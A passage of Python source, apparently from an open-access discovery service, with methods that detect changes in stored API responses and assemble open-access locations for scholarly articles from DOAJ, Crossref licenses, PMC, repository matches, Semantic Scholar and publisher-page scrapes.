# remove these keys from comparison because their contents are volatile or we don't care about them
return ["updated", "last_changed_date", "x_reported_noncompliant_copies", "x_error", "data_standard"]
@staticmethod
def ignored_keys_for_external_diff():
# remove these keys because they have been added to the api response but we don't want to trigger a diff
return Pub.ignored_keys_for_internal_diff()
@staticmethod
def ignored_top_level_keys_for_external_diff():
# existing ignored key regex method doesn't work for multiline keys
# but don't want to replace it yet because it works on nested rows
return ["z_authors", "oa_locations_embargoed"]
@staticmethod
def remove_response_keys(jsonb_response, keys):
response_copy = json.loads(json.dumps(jsonb_response))
for key in keys:
try:
del response_copy[key]
except KeyError:
pass
return response_copy
def has_changed(self, old_response_jsonb, ignored_keys, ignored_top_level_keys):
if not old_response_jsonb:
logger.info("response for {} has changed: no old response".format(self.id))
return True
copy_of_new_response = Pub.remove_response_keys(self.response_jsonb, ignored_top_level_keys)
copy_of_old_response = Pub.remove_response_keys(old_response_jsonb, ignored_top_level_keys)
# have to sort to compare
copy_of_new_response_in_json = json.dumps(copy_of_new_response, sort_keys=True, indent=2)
# have to sort to compare
copy_of_old_response_in_json = json.dumps(copy_of_old_response, sort_keys=True, indent=2)
for key in ignored_keys:
# remove it
copy_of_new_response_in_json = re.sub(r'"{}":\s*".+?",?\s*'.format(key), '', copy_of_new_response_in_json)
copy_of_old_response_in_json = re.sub(r'"{}":\s*".+?",?\s*'.format(key), '', copy_of_old_response_in_json)
# also remove it if it is an empty list
copy_of_new_response_in_json = re.sub(r'"{}":\s*\[\],?\s*'.format(key), '', copy_of_new_response_in_json)
copy_of_old_response_in_json = re.sub(r'"{}":\s*\[\],?\s*'.format(key), '', copy_of_old_response_in_json)
# also anything till a comma (gets data_standard)
copy_of_new_response_in_json = re.sub(r'"{}":\s*.+?,\s*'.format(key), '', copy_of_new_response_in_json)
copy_of_old_response_in_json = re.sub(r'"{}":\s*.+?,\s*'.format(key), '', copy_of_old_response_in_json)
return copy_of_new_response_in_json != copy_of_old_response_in_json
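# Illustrative example (the sample responses are made up): if the old and new
# responses differ only in an ignored, volatile key such as "updated",
#   old = {"doi": "10.1234/abc", "oa_status": "gold", "updated": "2020-01-01T00:00:00"}
#   new = {"doi": "10.1234/abc", "oa_status": "gold", "updated": "2021-01-01T00:00:00"}
# then with self.response_jsonb = new,
#   self.has_changed(old, Pub.ignored_keys_for_internal_diff(), [])
# returns False; changing "oa_status" instead would make it return True.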
def update(self, force_update_rt=False):
return self.recalculate_and_store(force_update_rt=force_update_rt)
def recalculate_and_store(self, force_update_rt=False):
if not self.crossref_api_raw_new:
self.crossref_api_raw_new = self.crossref_api_raw
self.title = self.crossref_title
self.normalized_title = normalize_title(self.title)
if not self.published_date:
self.published_date = self.issued
if not self.rand:
self.rand = random.random()
old_response_jsonb = self.response_jsonb
self.clear_results()
try:
self.recalculate()
except NoDoiException:
logger.info("invalid doi {}".format(self))
self.error += "Invalid DOI"
pass
self.set_results()
self.mint_pages()
self.scrape_green_locations(GreenScrapeAction.queue)
self.store_pdf_urls_for_validation()
self.store_refresh_priority()
self.store_preprint_relationships()
self.store_retractions()
response_changed = self.decide_if_response_changed(old_response_jsonb)
if force_update_rt or response_changed:
self.create_or_update_recordthresher_record()
def decide_if_response_changed(self, old_response_jsonb):
response_changed = False
if self.has_changed(old_response_jsonb, Pub.ignored_keys_for_external_diff(), Pub.ignored_top_level_keys_for_external_diff()):
logger.info("changed! updating last_changed_date for this record! {}".format(self.id))
self.last_changed_date = datetime.datetime.utcnow().isoformat()
response_changed = True
if self.has_changed(old_response_jsonb, Pub.ignored_keys_for_internal_diff(), []):
logger.info("changed! updating updated timestamp for this record! {}".format(self.id))
self.updated = datetime.datetime.utcnow()
self.response_jsonb['updated'] = datetime.datetime.utcnow().isoformat()
response_changed = True
if response_changed:
flag_modified(self, "response_jsonb") # force it to be saved
else:
self.response_jsonb = old_response_jsonb # don't save if only ignored fields changed
return response_changed
def run(self):
try:
self.recalculate_and_store()
except NoDoiException:
logger.info("invalid doi {}".format(self))
self.error += "Invalid DOI"
pass
# logger.info(json.dumps(self.response_jsonb, indent=4))
def run_with_hybrid(self, quiet=False, shortcut_data=None):
logger.info("in run_with_hybrid")
self.clear_results()
try:
self.refresh()
except NoDoiException:
logger.info("invalid doi {}".format(self))
self.error += "Invalid DOI"
pass
# set whether changed or not
self.set_results()
@property
def has_been_run(self):
if self.evidence:
return True
return False
@property
def best_redirect_url(self):
return self.fulltext_url or self.url
@property
def has_fulltext_url(self):
return self.fulltext_url is not None
@property
def has_license(self):
if not self.license:
return False
if self.license == "unknown":
return False
return True
@property
def clean_doi(self):
if not self.id:
return None
return normalize_doi(self.id)
def ask_manual_overrides(self):
if not self.doi:
return
override_dict = oa_manual.get_override_dict(self)
if override_dict is not None:
logger.info("manual override for {}".format(self.doi))
self.open_locations = []
if override_dict:
my_location = OpenLocation()
my_location.pdf_url = None
my_location.metadata_url = None
my_location.license = None
my_location.version = None
my_location.evidence = "manual"
my_location.doi = self.doi
# set just what the override dict specifies
for (k, v) in override_dict.items():
setattr(my_location, k, v)
# don't append, make it the only one
self.open_locations.append(my_location)
def ask_preprints(self):
preprint_relationships = FilteredPreprint.query.filter(FilteredPreprint.postprint_id == self.doi).all()
for preprint_relationship in preprint_relationships:
preprint_pub = Pub.query.get(preprint_relationship.preprint_id)
if preprint_pub:
try:
# don't look for pre/postprints here or you get circular lookups
preprint_pub.recalculate(ask_preprint=False)
# get the best location that's actually a preprint - don't include other copies of the preprint
all_locations = preprint_pub.deduped_sorted_locations
preprint_locations = [loc for loc in all_locations if loc.host_type == 'repository']
if preprint_locations:
self.open_locations.append(preprint_locations[0])
except NoDoiException:
pass
def ask_postprints(self):
preprint_relationships = FilteredPreprint.query.filter(FilteredPreprint.preprint_id == self.doi).all()
for preprint_relationship in preprint_relationships:
postprint_pub = Pub.query.get(preprint_relationship.postprint_id)
if postprint_pub:
try:
# don't look for pre/postprints here or you get circular lookups
postprint_pub.recalculate(ask_preprint=False)
# get the best location that's actually a postprint - don't include other preprints
all_locations = postprint_pub.deduped_sorted_locations
postprint_locations = [loc for loc in all_locations if loc.host_type == 'publisher' and loc.version == 'publishedVersion']
if postprint_locations:
self.open_locations.append(postprint_locations[0])
except NoDoiException:
pass
@property
def fulltext_url(self):
return self.free_pdf_url or self.free_metadata_url or None
@property
def is_preprint(self):
return self.genre == 'posted-content' and not self.issns
def make_preprint(self, oa_location):
oa_location.evidence = re.sub(r'.*?(?= \(|$)', 'oa repository', oa_location.evidence or '', 1)
oa_location.version = "submittedVersion"
def decide_if_open(self):
# walk the locations from worst to best; each assignment overwrites the
# previous one, so the best (first-sorted) location ends up winning
self.license = None
self.free_metadata_url = None
self.free_pdf_url = None
self.oa_status = OAStatus.closed
self.version = None
self.evidence = None
reversed_sorted_locations = self.sorted_locations
reversed_sorted_locations.reverse()
# go through all the locations, using valid ones to update the best open url data
for location in reversed_sorted_locations:
self.free_pdf_url = location.pdf_url
self.free_metadata_url = location.metadata_url
self.evidence = location.evidence
self.version = location.version
self.license = location.license
if reversed_sorted_locations:
if self.is_preprint:
self.oa_status = OAStatus.green
else:
self.oa_status = sorted(reversed_sorted_locations, key=oa_status_sort_key)[-1].oa_status
# don't return an open license on a closed thing, that's confusing
if not self.fulltext_url:
self.license = None
self.evidence = None
self.oa_status = OAStatus.closed
self.version = None
def clear_locations(self):
self.reset_vars()
@property
def has_hybrid(self):
return any([location.oa_status is OAStatus.hybrid for location in self.all_oa_locations])
@property
def has_gold(self):
return any([location.oa_status is OAStatus.gold for location in self.all_oa_locations])
@property
def has_green(self):
return any([location.oa_status is OAStatus.green for location in self.all_oa_locations])
def refresh_green_locations(self):
for my_page in self.pages:
my_page.scrape()
def refresh_hybrid_scrape(self):
logger.info("***** {}: {}".format(self.publisher, self.journal))
# look for hybrid
self.scrape_updated = datetime.datetime.utcnow()
# reset
self.scrape_evidence = None
self.scrape_pdf_url = None
self.scrape_metadata_url = None
self.scrape_license = None
self.resolved_doi_url = None
if self.url:
with PublisherWebpage(url=self.url,
related_pub_doi=self.doi,
related_pub_publisher=self.publisher,
session_id=self.session_id,
issn_l=self.issn_l) as publisher_landing_page:
# end the session before the scrape
# logger.info(u"closing session for {}".format(self.doi))
db.session.close()
self.scrape_page_for_open_location(publisher_landing_page)
self.resolved_doi_url = publisher_landing_page.resolved_url
self.resolved_doi_http_status = publisher_landing_page.resolved_http_status_code
# now merge our object back in
# logger.info(u"after scrape, merging {}".format(self.doi))
db.session.merge(self)
self.save_landing_page_text(publisher_landing_page.page_text)
if publisher_landing_page.is_open:
self.scrape_evidence = publisher_landing_page.open_version_source_string
self.scrape_pdf_url = publisher_landing_page.scraped_pdf_url
self.scrape_metadata_url = publisher_landing_page.scraped_open_metadata_url
self.scrape_license = publisher_landing_page.scraped_license
if (publisher_landing_page.is_open
and not publisher_landing_page.scraped_pdf_url
and not publisher_landing_page.use_resolved_landing_url(publisher_landing_page.scraped_open_metadata_url)
):
self.scrape_metadata_url = self.url
# Academic Medicine, delayed OA
if self.issn_l == '1040-2446' and self.issued < datetime.datetime.utcnow().date() - relativedelta(months=14):
if not self.scrape_metadata_url:
self.scrape_evidence = 'open (via free article)'
self.scrape_metadata_url = publisher_landing_page.resolved_url
logger.info('making {} bronze due to delayed OA policy'.format(self.doi))
# Genome Research, delayed OA
if self.issn_l == '1088-9051' and (self.issued < datetime.datetime.utcnow().date() - relativedelta(months=7) or self.scrape_pdf_url):
logger.info('making {} hybrid due to delayed OA policy'.format(self.doi))
self.scrape_evidence = 'open (via page says license)'
self.scrape_metadata_url = self.url
self.scrape_license = 'cc-by-nc'
return
def save_landing_page_text(self, page_text):
if not page_text:
return
try:
logger.info(f'saving {len(page_text)} characters to {self.landing_page_archive_url()}')
client = boto3.client('s3')
client.put_object(
Body=gzip.compress(page_text.encode('utf-8')),
Bucket=LANDING_PAGE_ARCHIVE_BUCKET,
Key=self.landing_page_archive_key()
)
self.doi_landing_page_is_archived = True
except Exception as e:
# page text is just nice-to-have for now
logger.error(f'failed to save landing page: {e}')
def find_open_locations(self, ask_preprint=True):
# just based on doi
if local_lookup := self.ask_local_lookup():
if local_lookup['is_future']:
self.embargoed_locations.append(local_lookup['location'])
else:
self.open_locations.append(local_lookup['location'])
self.ask_pmc()
# based on titles
self.set_title_hacks() # has to be before ask_green_locations, because changes titles
self.ask_green_locations()
self.ask_publisher_equivalent_pages()
self.ask_hybrid_scrape()
self.ask_s2()
if ask_preprint:
self.ask_preprints()
self.ask_postprints()
self.ask_manual_overrides()
self.remove_redundant_embargoed_locations()
def landing_page_archive_key(self):
return urllib.parse.quote(self.doi, safe='')
def landing_page_archive_url(self):
return f's3://{LANDING_PAGE_ARCHIVE_BUCKET}/{self.landing_page_archive_key()}'
def remove_redundant_embargoed_locations(self):
if any([loc.host_type == 'publisher' for loc in self.all_oa_locations]):
self.embargoed_locations = [loc for loc in self.embargoed_locations if loc.host_type != 'publisher']
def ask_local_lookup(self):
evidence = None
fulltext_url = self.url
license = None
pdf_url = None
version = "publishedVersion" # default
oa_date = None
publisher_specific_license = None
if oa_local.is_open_via_doaj(self.issns, self.all_journals, self.year):
license = oa_local.is_open_via_doaj(self.issns, self.all_journals, self.year)
evidence = oa_evidence.oa_journal_doaj
oa_date = self.issued
crossref_license = oa_local.is_open_via_license_urls(self.crossref_licenses, self.issns)
if crossref_license:
freetext_license = crossref_license['url']
license = oa_local.find_normalized_license(freetext_license)
elif (
any(self.is_same_publisher(p) for p in ['BMJ', 'Swiss Chemical Society'])
and self.scrape_license
):
license = self.scrape_license
elif oa_local.is_open_via_publisher(self.publisher):
evidence = oa_evidence.oa_journal_publisher
license = oa_local.find_normalized_license(oa_local.is_open_via_publisher(self.publisher))
if license == 'implied-oa' and self.scrape_license:
license = self.scrape_license
oa_date = self.issued
elif oa_local.is_open_via_publisher_genre(self.publisher, self.genre):
evidence = oa_evidence.oa_journal_publisher
license = oa_local.find_normalized_license(oa_local.is_open_via_publisher_genre(self.publisher, self.genre))
oa_date = self.issued
elif self.is_open_journal_via_observed_oa_rate():
evidence = oa_evidence.oa_journal_observed
oa_date = self.issued
elif oa_local.is_open_via_manual_journal_setting(self.issns, self.year):
evidence = oa_evidence.oa_journal_manual
oa_date = self.issued
license = oa_local.manual_gold_journal_license(self.issn_l)
elif oa_local.is_open_via_doi_fragment(self.doi):
evidence = "oa repository (via doi prefix)"
oa_date = self.issued
elif oa_local.is_open_via_journal_doi_prefix(self.doi):
evidence = "oa journal (via doi prefix)"
oa_date = self.issued
elif oa_local.is_open_via_url_fragment(self.url):
evidence = "oa repository (via url prefix)"
oa_date = self.issued
elif oa_local.is_open_via_license_urls(self.crossref_licenses, self.issns):
crossref_license = oa_local.is_open_via_license_urls(self.crossref_licenses, self.issns)
freetext_license = crossref_license['url']
license = oa_local.find_normalized_license(freetext_license)
evidence = "open (via crossref license)"
oa_date = crossref_license['date'] or self.issued
elif self.open_manuscript_licenses:
manuscript_license = self.open_manuscript_licenses[-1]
has_open_manuscript = True
freetext_license = manuscript_license['url']
license = oa_local.find_normalized_license(freetext_license)
oa_date = manuscript_license['date'] or self.issued
if freetext_license and not license:
license = "publisher-specific, author manuscript"
publisher_specific_license = freetext_license
version = "acceptedVersion"
if self.is_same_publisher("Elsevier BV"):
elsevier_id = self.crossref_alternative_id
pdf_url = "http://manuscript.elsevier.com/{}/pdf/{}.pdf".format(elsevier_id, elsevier_id)
elif self.is_same_publisher("American Physical Society (APS)"):
proper_case_id = self.id
proper_case_id = proper_case_id.replace("revmodphys", "RevModPhys")
proper_case_id = proper_case_id.replace("physrevlett", "PhysRevLett")
proper_case_id = proper_case_id.replace("physreva", "PhysRevA")
proper_case_id = proper_case_id.replace("physrevb", "PhysRevB")
proper_case_id = proper_case_id.replace("physrevc", "PhysRevC")
proper_case_id = proper_case_id.replace("physrevd", "PhysRevD")
proper_case_id = proper_case_id.replace("physreve", "PhysRevE")
proper_case_id = proper_case_id.replace("physrevx", "PhysRevX")
proper_case_id = proper_case_id.replace("physrevaccelbeams", "PhysRevAccelBeams")
proper_case_id = proper_case_id.replace("physrevapplied", "PhysRevApplied")
proper_case_id = proper_case_id.replace("physrevphyseducres", "PhysRevPhysEducRes")
proper_case_id = proper_case_id.replace("physrevstper", "PhysRevSTPER")
if proper_case_id != self.id:
pdf_url = "https://link.aps.org/accepted/{}".format(proper_case_id)
elif self.is_same_publisher("AIP Publishing"):
pdf_url = "https://aip.scitation.org/doi/{}".format(self.id)
elif self.is_same_publisher("IOP Publishing"):
has_open_manuscript = False
elif self.is_same_publisher("Wiley-Blackwell"):
has_open_manuscript = False
elif self.is_same_publisher("Wiley"):
pdf_url = 'https://rss.onlinelibrary.wiley.com/doi/am-pdf/{}'.format(self.doi)
elif self.is_same_publisher("American Geophysical Union (AGU)"):
pdf_url = 'https://rss.onlinelibrary.wiley.com/doi/am-pdf/{}'.format(self.doi)
elif self.is_same_publisher("Royal Society of Chemistry (RSC)"):
has_open_manuscript = False
elif self.is_same_publisher("Oxford University Press (OUP)"):
has_open_manuscript = False
# just bail for now. is too hard to figure out which ones are real.
# # IOP isn't trustworthy, and made a fuss, so check them.
# # this includes /ampdf: http://iopscience.iop.org/article/10.1088/0029-5515/55/8/083011
# # this does not: http://iopscience.iop.org/article/10.1088/1741-2552/aad46e
#
# logger.info(u"doing live check on IOP author manuscript")
# r = requests.get("http://iopscience.iop.org/article/{}".format(self.id))
# if "/ampdf" in r.content:
# logger.info(u"is iop open manuscript!")
# pdf_url = "http://iopscience.iop.org/article/{}/ampdf".format(self.id)
# else:
# logger.info(u"is NOT iop open manuscript")
# has_open_manuscript = False
elif freetext_license == 'https://academic.oup.com/journals/pages/open_access/funder_policies/chorus/standard_publication_model':
# license says available after 12 months
oa_date = self.issued + relativedelta(months=12)
if has_open_manuscript:
evidence = "open (via crossref license, author manuscript)"
elif self.predicted_bronze_embargo_end:
evidence = "embargoed (via journal policy)"
oa_date = self.predicted_bronze_embargo_end
if (
evidence
and self.resolved_doi_url
and self.resolved_doi_url.startswith('https://journals.co.za')
and self.resolved_doi_http_status == 404
):
fulltext_url = 'https://journals.co.za/doi/{}'.format(self.id.upper())
self.resolved_doi_http_status = 203
failed_scrape = self.resolved_doi_http_status in [404, -1] and self.issn_l not in [
'2324-1098', # gold and online, but can't scrape it for some reason
]
if evidence and not failed_scrape:
my_location = OpenLocation()
my_location.metadata_url = fulltext_url
my_location.license = license
my_location.evidence = evidence
my_location.updated = datetime.datetime.utcnow()
my_location.doi = self.doi
my_location.version = version
my_location.oa_date = oa_date
my_location.publisher_specific_license = publisher_specific_license
if pdf_url:
my_location.pdf_url = pdf_url
is_future = my_location.oa_date and my_location.oa_date > datetime.datetime.utcnow().date()
if my_location.oa_status is OAStatus.bronze and not is_future:
my_location.oa_date = None
if self.is_preprint:
self.make_preprint(my_location)
return {'location': my_location, 'is_future': is_future}
return None
def ask_pmc(self):
for pmc_obj in self.pmcid_links:
if pmc_obj.release_date == "live":
my_location = OpenLocation()
my_location.metadata_url = "https://www.ncbi.nlm.nih.gov/pmc/articles/{}".format(pmc_obj.pmcid.upper())
# we don't know this has a pdf version
# my_location.pdf_url = "https://www.ncbi.nlm.nih.gov/pmc/articles/{}/pdf".format(pmc_obj.pmcid.upper())
my_location.evidence = "oa repository (via pmcid lookup)"
my_location.updated = datetime.datetime.utcnow()
my_location.doi = self.doi
my_location.version = pmc_obj.version
# set version in one central place for pmc right now, till refactor done
self.open_locations.append(my_location)
@property
def has_stored_hybrid_scrape(self):
return self.scrape_evidence and self.scrape_evidence != "closed"
def ask_hybrid_scrape(self):
if self.has_stored_hybrid_scrape:
my_location = OpenLocation()
my_location.pdf_url = self.scrape_pdf_url
my_location.metadata_url = self.scrape_metadata_url
my_location.license = self.scrape_license
my_location.evidence = self.scrape_evidence
my_location.updated = self.scrape_updated and self.scrape_updated.isoformat()
my_location.doi = self.doi
my_location.version = "publishedVersion"
if my_location.pdf_url and '/article/am/pii/' in my_location.pdf_url:
my_location.version = "acceptedVersion"
if self.is_preprint:
self.make_preprint(my_location)
if my_location.oa_status in [OAStatus.gold, OAStatus.hybrid, OAStatus.green]:
my_location.oa_date = self.issued
if self.issn_l == '0270-6474' and my_location.oa_date:
my_location.oa_date = my_location.oa_date + datetime.timedelta(days=190)
if my_location.oa_date and my_location.oa_date > datetime.datetime.utcnow().date():
self.embargoed_locations.append(my_location)
else:
self.open_locations.append(my_location)
else:
self.open_locations.append(my_location)
@property
def page_matches_by_doi_filtered(self):
return self.page_matches_by_doi + self.repo_page_matches_by_doi
@property
def page_matches_by_title_filtered(self):
my_pages = []
if not self.normalized_title:
return my_pages
for my_page in self.repo_page_matches_by_title:
# don't do this right now. not sure if it helps or hurts.
# don't check title match if we already know it belongs to a different doi
# if my_page.doi and my_page.doi != self.doi:
# continue
if hasattr(my_page, "pmh_record") and my_page.pmh_record and is_known_mismatch(self.id, my_page.pmh_record):
continue
# double check author match
match_type = "title"
if self.first_author_lastname or self.last_author_lastname:
if my_page.authors:
try:
pmh_author_string = normalize(", ".join(my_page.authors))
if self.first_author_lastname and normalize(self.first_author_lastname) in pmh_author_string:
match_type = "title and first author"
elif self.last_author_lastname and normalize(self.last_author_lastname) in pmh_author_string:
match_type = "title and last author"
else:
# logger.info(
# u"author check fails, so skipping this record. Looked for {} and {} in {}".format(
# self.first_author_lastname, self.last_author_lastname, pmh_author_string))
# logger.info(self.authors)
# don't match if bad author match
continue
except TypeError:
pass # couldn't make author string
my_page.match_evidence = "oa repository (via OAI-PMH {} match)".format(match_type)
my_pages.append(my_page)
return my_pages
@property
def pages(self):
my_pages = []
# @todo remove these checks once we are just using the new page
if self.normalized_title:
if title_is_too_short(self.normalized_title):
# logger.info(u"title too short! don't match by title")
pass
elif title_is_too_common(self.normalized_title):
# logger.info(u"title too common! don't match by title.")
pass
elif self.id and '/(issn)' in self.id.lower():
pass
else:
my_pages = self.page_matches_by_title_filtered
if max_pages_from_one_repo([p.endpoint_id for p in self.page_matches_by_title_filtered]) >= 10:
my_pages = []
logger.info("matched too many pages in one repo, not allowing matches")
        # handle DOI matches last: the page objects are the same instances, not copies, so the DOI evidence overwrites the title evidence
for my_page in self.page_matches_by_doi_filtered:
my_page.match_evidence = "oa repository (via OAI-PMH doi match)"
if not my_page.scrape_version and "/pmc/" in my_page.url:
my_page.set_info_for_pmc_page()
my_pages.append(my_page)
return [
p for p in my_pages
# don't match bioRxiv or Research Square preprints to themselves
if not (p.doi == self.doi and p.endpoint_id in [
oa_page.biorxiv_endpoint_id, oa_page.research_square_endpoint_id
])
]
def ask_green_locations(self):
has_new_green_locations = False
for my_page in [p for p in self.pages if p.pmh_id != oa_page.publisher_equivalent_pmh_id]:
            # this step isn't scraping, it's just looking in the db
# recalculate the version and license based on local PMH metadata in case code changes find more things
if hasattr(my_page, "scrape_version") and my_page.scrape_version is not None:
my_page.update_with_local_info()
if my_page.is_open:
new_open_location = OpenLocation()
new_open_location.pdf_url = my_page.scrape_pdf_url
new_open_location.metadata_url = my_page.scrape_metadata_url
new_open_location.license = my_page.scrape_license
new_open_location.evidence = my_page.match_evidence
new_open_location.version = my_page.scrape_version
new_open_location.updated = my_page.scrape_updated
new_open_location.doi = self.doi
new_open_location.pmh_id = my_page.bare_pmh_id
new_open_location.endpoint_id = my_page.endpoint_id
new_open_location.institution = my_page.repository_display_name
new_open_location.oa_date = my_page.first_available
# dates only reliably recorded after 2020-08-07
if new_open_location.oa_date and new_open_location.oa_date < datetime.date(2020, 8, 7):
new_open_location.oa_date = None
self.open_locations.append(new_open_location)
has_new_green_locations = True
return has_new_green_locations
def ask_publisher_equivalent_pages(self):
has_new_green_locations = False
for my_page in [p for p in self.pages if p.pmh_id == oa_page.publisher_equivalent_pmh_id]:
if my_page.is_open:
new_open_location = OpenLocation()
new_open_location.pdf_url = my_page.scrape_pdf_url
new_open_location.metadata_url = my_page.scrape_metadata_url
new_open_location.license = my_page.scrape_license
new_open_location.evidence = my_page.scrape_version
new_open_location.version = 'publishedVersion'
new_open_location.updated = my_page.scrape_updated
new_open_location.doi = my_page.doi
new_open_location.pmh_id = None
new_open_location.endpoint_id = None
if new_open_location.is_hybrid:
new_open_location.oa_date = self.issued
self.open_locations.append(new_open_location)
has_new_green_locations = True
return has_new_green_locations
def ask_s2(self):
lookup = db.session.query(S2Lookup).get(self.doi)
if lookup:
location = OpenLocation()
location.endpoint_id = s2_endpoint_id
location.pdf_url = lookup.s2_pdf_url
location.metadata_url = lookup.s2_url
location.evidence = 'oa repository (semantic scholar lookup)'
location.updated = datetime.datetime(2019, 10, 1)
location.doi = self.doi
location.version = 'submittedVersion'
self.open_locations.append(location)
def scrape_green_locations(self, green_scrape=GreenScrapeAction.queue):
for my_page in self.pages:
if isinstance(my_page, page.PageNew):
if green_scrape is GreenScrapeAction.scrape_now:
my_page.scrape_if_matches_pub()
elif green_scrape is GreenScrapeAction.queue:
my_page.enqueue_scrape_if_matches_pub()
# comment out for now so that not scraping by accident
# def scrape_these_pages(self, webpages):
# webpage_arg_list = [[page] for page in webpages]
# call_args_in_parallel(self.scrape_page_for_open_location, webpage_arg_list)
def scrape_page_for_open_location(self, my_webpage):
try:
if not self.should_scrape_publisher_page():
logger.info('skipping publisher scrape')
return
find_pdf_link = self.should_look_for_publisher_pdf()
if not find_pdf_link:
logger.info('skipping pdf search')
my_webpage.scrape_for_fulltext_link(find_pdf_link=find_pdf_link, pdf_hint=self.crossref_text_mining_pdf)
if my_webpage.error:
self.error += my_webpage.error
if my_webpage.is_open:
my_open_location = my_webpage.mint_open_location()
self.open_locations.append(my_open_location)
# logger.info(u"found open version at", webpage.url)
else:
# logger.info(u"didn't find open version at", webpage.url)
pass
except requests.Timeout as e:
self.error += "Timeout in scrape_page_for_open_location on {}: {}".format(
my_webpage, str(e))
logger.info(self.error)
except requests.exceptions.ConnectionError as e:
self.error += "ConnectionError in scrape_page_for_open_location on {}: {}".format(
my_webpage, str(e))
logger.info(self.error)
except requests.exceptions.ChunkedEncodingError as e:
self.error += "ChunkedEncodingError in scrape_page_for_open_location on {}: {}".format(
my_webpage, str(e))
logger.info(self.error)
except requests.exceptions.RequestException as e:
self.error += "RequestException in scrape_page_for_open_location on {}: {}".format(
my_webpage, str(e))
logger.info(self.error)
except etree.XMLSyntaxError as e:
self.error += "XMLSyntaxError in scrape_page_for_open_location on {}: {}".format(
my_webpage, str(e))
logger.info(self.error)
except Exception:
logger.exception("Exception in scrape_page_for_open_location")
self.error += "Exception in scrape_page_for_open_location"
logger.info(self.error)
def should_scrape_publisher_page(self):
if self.genre == 'journal':
return False
return True
def should_look_for_publisher_pdf(self):
if self.genre == 'book':
return False
if self.issn_l in [
# landing page has pdfs for every article in issue
'1818-5487', # Aquatic Invasions
'2072-5981', # Magnetic resonance in solids
'1989-8649', # Management of Biological Invasions
'2164-3989', # The Professional Counselor
'0970-9274', # Journal of Human Ecology
'0973-5070', # STUDIES ON ETHNO-MEDICINE
# in doaj, PDF has full issue so landing page is more specific
'2471-190X', # Open Rivers: Rethinking Water, Place & Community
'0097-6156', # Books
# in doaj, doi leads to current issue so PDF is useless
'0210-6124', # Atlantis. Journal of the Spanish Association for Anglo-American Studies
]:
return False
        if self.issn_l == '0007-0610' and self.year and self.year <= 1999:
# British Dental Journal, https://www.nature.com/articles/4806453.pdf
return False
return True
def set_title_hacks(self):
workaround_titles = {
            # these preprints don't have the same title as the doi
# eventually solve these by querying arxiv like this:
# http://export.arxiv.org/api/query?search_query=doi:10.1103/PhysRevD.89.085017
"10.1016/j.astropartphys.2007.12.004": "In situ radioglaciological measurements near Taylor Dome, Antarctica and implications for UHE neutrino astronomy",
"10.1016/s0375-9601(02)01803-0": "Universal quantum computation using only projective measurement, quantum memory, and preparation of the 0 state",
"10.1103/physreva.65.062312": "An entanglement monotone derived from Grover's algorithm",
# crossref has title "aol" for this
# set it to real title
"10.1038/493159a": "Altmetrics: Value all research products",
# crossref has no title for this
"10.1038/23891": "Complete quantum teleportation using nuclear magnetic resonance",
# is a closed-access datacite one, with the open-access version in BASE
            # need to set title here because we're not looking up datacite titles yet (they're usually open access directly)
"10.1515/fabl.1988.29.1.21": "Thesen zur Verabschiedung des Begriffs der 'historischen Sage'",
# preprint has a different title
"10.1123/iscj.2016-0037": "METACOGNITION AND PROFESSIONAL JUDGMENT AND DECISION MAKING: IMPORTANCE, APPLICATION AND EVALUATION",
# preprint has a different title
"10.1038/s41477-017-0066-9": "Low Rate of Somatic Mutations in a Long-Lived Oak Tree",
"10.1101/2020.08.10.238428": "Cell-programmed nutrient partitioning in the tumour microenvironment",
# mysteriously missing from crossref now
"10.1093/annweh/wxy044": "Development of and Selected Performance Characteristics of CANJEM, a General Population Job-Exposure Matrix Based on Past Expert Assessments of Exposure"
}
if self.doi in workaround_titles:
self.title = workaround_titles[self.doi]
self.normalized_title = normalize_title(self.title)
def set_license_hacks(self):
if self.fulltext_url and "harvard.edu/" in self.fulltext_url:
if not self.license or self.license == "unknown":
self.license = "cc-by-nc"
@property
def crossref_alternative_id(self):
try:
return re.sub(r"\s+", " ", self.crossref_api_raw_new["alternative-id"][0])
except (KeyError, TypeError, AttributeError):
return None
@property
def publisher(self):
try:
return re.sub("\s+", " ", self.crossref_api_modified["publisher"])
except (KeyError, TypeError, AttributeError):
return None
@property
def volume(self):
try:
return self.crossref_api_raw_new["volume"]
except (KeyError, TypeError, AttributeError):
return None
@property
def issue(self):
try:
return self.crossref_api_raw_new["issue"]
except (KeyError, TypeError, AttributeError):
return None
@property
def first_page(self):
try:
return self.crossref_api_raw_new["page"].split('-')[0]
except (KeyError, TypeError, AttributeError):
return None
@property
def last_page(self):
try:
return self.crossref_api_raw_new["page"].split('-')[-1]
except (KeyError, TypeError, AttributeError):
return None
@property
def issued(self):
try:
if self.crossref_api_raw_new and "date-parts" in self.crossref_api_raw_new["issued"]:
date_parts = self.crossref_api_raw_new["issued"]["date-parts"][0]
return get_citeproc_date(*date_parts)
except (KeyError, TypeError, AttributeError):
return None
@property
def deposited(self):
try:
if self.crossref_api_raw_new and "date-parts" in self.crossref_api_raw_new["deposited"]:
date_parts = self.crossref_api_raw_new["deposited"]["date-parts"][0]
return get_citeproc_date(*date_parts)
except (KeyError, TypeError, AttributeError):
return None
@property
def created(self):
try:
if self.crossref_api_raw_new and "date-parts" in self.crossref_api_raw_new["created"]:
date_parts = self.crossref_api_raw_new["created"]["date-parts"][0]
return get_citeproc_date(*date_parts)
except (KeyError, TypeError, AttributeError):
return None
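    # A note on the shapes consumed above (taken from the public Crossref REST
    # API; the concrete values are illustrative only): "issued", "deposited"
    # and "created" are citeproc date objects such as
    #   {"date-parts": [[2019, 5, 17]]}
    # so get_citeproc_date(2019, 5, 17) builds the corresponding datetime.date.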
@property
def crossref_text_mining_pdf(self):
try:
for link in self.crossref_api_modified['link']:
if (
link['content-version'] == 'vor' and
link['intended-application'] == 'text-mining' and
                    link['content-type'] == 'application/pdf'
):
return link['URL']
except (KeyError, TypeError, AttributeError):
return None
@property
def open_manuscript_licenses(self):
try:
license_dicts = self.crossref_api_modified["license"]
author_manuscript_urls = []
for license_dict in license_dicts:
if license_dict["URL"] in oa_local.closed_manuscript_license_urls():
continue
license_date = None
if license_dict.get("content-version", None):
if license_dict["content-version"] == "am":
if license_dict.get("start", None):
if license_dict["start"].get("date-time", None):
license_date = license_dict["start"]["date-time"]
try:
license_date = license_date and dateutil.parser.parse(license_date).date()
license_date += self._author_manuscript_delay()
except Exception:
license_date = None
author_manuscript_urls.append({'url': license_dict["URL"], 'date': license_date})
return sorted(author_manuscript_urls, key=lambda amu: amu['date'])
except (KeyError, TypeError):
return []
def _author_manuscript_delay(self):
